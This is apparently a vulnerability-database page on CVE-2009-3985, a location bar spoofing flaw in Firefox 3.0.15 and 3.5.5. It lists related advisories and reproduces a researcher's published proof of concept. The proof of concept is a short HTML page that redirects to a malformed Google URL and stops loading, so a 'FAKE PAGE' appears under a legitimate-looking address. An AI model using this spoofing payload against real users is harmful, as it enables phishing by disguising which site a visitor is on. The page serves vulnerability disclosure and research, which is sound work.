Mozilla Firefox Location Bar Spoofing Vulnerability in Version 3.0.15 & 3.5.
Reporter | Title | Published | Views | Family All 134 |
---|---|---|---|---|
exploitpack | Mozilla Firefox - Location Bar Spoofing | 18 Dec 200900:00 | โ | exploitpack |
0day.today | Mozilla Firefox Location Bar Spoofing Vulnerability | 18 Dec 200900:00 | โ | zdt |
Veracode | Spoofed Content Association | 10 Apr 202000:41 | โ | veracode |
seebug.org | Firefoxๅ ๅฎนๆณจๅ ฅ็ฝ้กตๆฌบ้ชๆผๆด | 18 Dec 200900:00 | โ | seebug |
seebug.org | Mozilla Firefox Location Bar Spoofing Vulnerability | 18 Dec 200900:00 | โ | seebug |
UbuntuCve | CVE-2009-3985 | 15 Dec 200900:00 | โ | ubuntucve |
securityvulns | Mozilla Foundation Security Advisory 2009-69 | 17 Dec 200900:00 | โ | securityvulns |
securityvulns | Mozilla Firefox multiple security vulnerabilities | 17 Dec 200900:00 | โ | securityvulns |
Exploit DB | Mozilla Firefox - Location Bar Spoofing | 18 Dec 200900:00 | โ | exploitdb |
Cvelist | CVE-2009-3985 | 17 Dec 200917:00 | โ | cvelist |
`<!-----------------------------------------------------------------
Exploit Title: MOZILLA FIREFOX LOCATION BAR SPOOFING VULNERABILITY
Date: 2009-12-18
Author: Jordi Chancel
Software Link: http://www.mozilla.org/security/announce/2009/mfsa2009-69.html
Version: Mozilla Firefox 3.0.15 & 3.5.5
Tested on: Windows XP-VISTA-SEVEN & LINUX BACKTRACK
CVE : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3985
DESCRIPTION: {
Security researcher Jordi Chancel reported an issue similar to one fixed in mfsa2009-44
in which a web page can set document.location to a URL that can't be displayed properly and then inject
content into the resulting blank page. An attacker could use this vulnerability to place a legitimate-looking
but invalid URL in the location bar and inject HTML and JavaScript into the body of the
page, resulting in a spoofing attack. }
Code :
------------------------------------------------------------------------>
<html>
<title>FAKE PAGE</title>
<body onload="javascript:window.location = 'https://www.google.com%20';window.stop();void(0);">
<title>FAKE PAGE</title>
<h1>FAKE PAGE</h1>
<body>
</html>
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo